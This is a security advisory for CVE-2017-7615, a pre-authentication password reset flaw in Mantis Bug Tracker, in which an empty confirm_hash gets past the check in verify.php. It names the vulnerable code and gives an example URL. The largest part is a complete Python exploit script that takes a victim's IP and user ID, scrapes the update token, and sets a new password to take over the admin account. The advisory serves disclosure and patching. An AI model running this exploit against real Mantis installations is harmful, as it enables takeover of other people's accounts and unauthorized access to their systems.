174 lines
No EOL
4.2 KiB
Text
174 lines
No EOL
4.2 KiB
Text
[+] Credits: John Page a.k.a hyp3rlinx
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
|
|
Vendor:
|
|
================
|
|
www.mantisbt.org
|
|
|
|
|
|
|
|
Product:
|
|
==================
|
|
Mantis Bug Tracker
|
|
v1.3.0 / 2.3.0
|
|
|
|
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
|
|
|
|
|
|
Vulnerability Type:
|
|
===============================
|
|
Pre-Auth Remote Password Reset
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2017-7615
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
Mantis account verification page 'verify.php' allows resetting ANY user's password.
|
|
Remote un-authenticated attackers can send HTTP GET requests to Hijack ANY Mantis accounts by guessing the ID / username.
|
|
|
|
Vulnerable code:
|
|
|
|
In verify.php line 66:
|
|
|
|
if( $f_confirm_hash != $t_token_confirm_hash ) {
|
|
|
|
trigger_error( ERROR_LOST_PASSWORD_CONFIRM_HASH_INVALID, ERROR );
|
|
|
|
}
|
|
|
|
This code attempts to verify a user account and compares hashes for a user request.
|
|
However, by supplying empty value we easily bypass the security check.
|
|
|
|
e.g.
|
|
|
|
http://127.0.0.1/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
|
|
|
|
This will then allow you to change passwords and hijack ANY mantisbt accounts.
|
|
|
|
All version >= 1.3.0 as well as 2.3.0 are affected, 1.2.x versions are not affected.
|
|
|
|
|
|
References:
|
|
============
|
|
https://mantisbt.org/bugs/view.php?id=22690#c56509
|
|
|
|
|
|
|
|
POC Video URL:
|
|
==============
|
|
https://vimeo.com/213144905
|
|
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
import cookielib,urllib,urllib2,time
|
|
|
|
print 'Mantis Bug Tracker >= v1.3.0 - 2.3.0'
|
|
print '1.2.x versions are not affected'
|
|
print 'Remote Password Reset 0day Exploit'
|
|
print 'Credits: John Page a.k.a HYP3RLINX / APPARITIONSEC\n'
|
|
|
|
IP=raw_input("[Mantis Victim IP]>")
|
|
realname=raw_input("[Username]")
|
|
verify_user_id=raw_input("[User ID]")
|
|
passwd=raw_input("[New Password]")
|
|
|
|
TARGET = 'http://'+IP+'/mantisbt-2.3.0/verify.php?id='+verify_user_id+'&confirm_hash='
|
|
|
|
values={}
|
|
account_update_token=''
|
|
#verify_user_id='1' #Admin = 1
|
|
#realname='administrator' #Must be known or guessed.
|
|
|
|
|
|
#REQUEST 1, get Mantis account_update_token
|
|
cookies = cookielib.CookieJar()
|
|
|
|
opener = urllib2.build_opener(
|
|
urllib2.HTTPRedirectHandler(),
|
|
urllib2.HTTPHandler(debuglevel=0),
|
|
urllib2.HTTPSHandler(debuglevel=0),
|
|
urllib2.HTTPCookieProcessor(cookies))
|
|
|
|
res = opener.open(TARGET)
|
|
|
|
arr=res.readlines()
|
|
for s in arr:
|
|
if 'account_update_token' in s:
|
|
break
|
|
|
|
|
|
#print s[61:-38]
|
|
ACCT_TOKEN=s[61:-38]
|
|
|
|
time.sleep(0.3)
|
|
|
|
#REQUEST 2 Hijack the Admin Account
|
|
TARGET='http://'+IP+'/mantisbt-2.3.0/account_update.php'
|
|
values = {'verify_user_id' : '1',
|
|
'account_update_token' : ACCT_TOKEN,
|
|
'realname' : realname,
|
|
'password' : passwd,
|
|
'password_confirm' : passwd}
|
|
|
|
data = urllib.urlencode(values)
|
|
|
|
opener = urllib2.build_opener(
|
|
urllib2.HTTPRedirectHandler(),
|
|
urllib2.HTTPHandler(debuglevel=0),
|
|
urllib2.HTTPSHandler(debuglevel=0),
|
|
urllib2.HTTPCookieProcessor(cookies))
|
|
|
|
response = opener.open(TARGET, data)
|
|
the_page = response.read()
|
|
http_headers = response.info()
|
|
|
|
#print http_headers
|
|
print response.getcode()
|
|
print 'Account Hijacked!'
|
|
time.sleep(2)
|
|
|
|
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Remote
|
|
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Critical
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: April 7, 2017
|
|
Vendor acknowledged: April 7, 2017
|
|
Vendor patch created: April 10, 2017
|
|
Vendor Disclosure: April 16, 2017
|
|
April 16, 2017 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c). |